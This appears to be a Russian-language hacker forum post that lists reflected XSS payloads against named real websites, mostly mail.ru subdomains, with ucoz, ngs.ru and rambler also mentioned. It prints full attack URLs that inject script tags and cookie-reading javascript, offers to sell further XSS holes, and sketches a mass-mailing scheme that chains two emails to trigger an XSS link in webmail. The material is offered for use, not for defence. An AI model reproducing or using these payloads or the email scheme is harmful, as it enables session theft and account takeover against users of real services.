XSS на юкозe (работает только у авторизованных админов сайта)


Не почтовый сервер, просто не нашел куда засунуть его

Пассивная xss на ngs.ru

http://travel.mail.ru/news/46607/?%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E&page=1

думал уже все прикрыли =))

http://content.mail.ru/help/&%27%3E%3C%27%27%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3E
Так же продам пассивки XSS

IFRAME

пассивки на рамблер

Работает только у авторизованных (пробелы убрать)

http://travel.mail.ru/?'%3E%3C''%3E%22%3E%3Cscript%3Ealert(/Ruslan1817/)%3C/script%3Ecity_from=1&countryid=1934&countryidtxt=& cityid=1500&cityidtxt=&hotelidtxt=&inp_mode=sel&ca t4=on&cat5=on&price=%3Cimg+src%3D%22javascript%3Aa lert%28document.cookie%29%22%3E&p_mode=1&p_type=2& nights1=%3Cimg+src%3D%22javascript%3Aalert%28docum ent.cookie%29%22%3E&nights2=%3Cimg+src%3D%22javasc ript%3Aalert%28document.cookie%29%22%3E&date1_d=1& date1_my=10_2009&date2_d=22&date2_my=11_2009&HB=on &STD=on&comments=%3Cimg+src%3D%22javascript%3Aa ler t%28document.cookie%29%22%3E&mod=custom_order_tour

По поводу этой штуки работает многоходовка, да и работает ли...?
Отсылаем мыло. В мыле img на вашем сайте, который запустит скажем php скрипт который узнает рефер (id письма) и вышлет еще одно письмо. С ссылкой XSS на первое письмо....
Даже если первое письмо удалят, оно валяется в удаленных и все равно сработает, т.к. второе письмо прилетит как только откроют перовое... НО надо ведь, что бы первое письмо открыли, а во втором письме прошли по ссылке конечно если разослать миллиону товарищей то возможно эффект будет...

ЗЫ Совсем забыла, XSS работает если в письме есть вложение.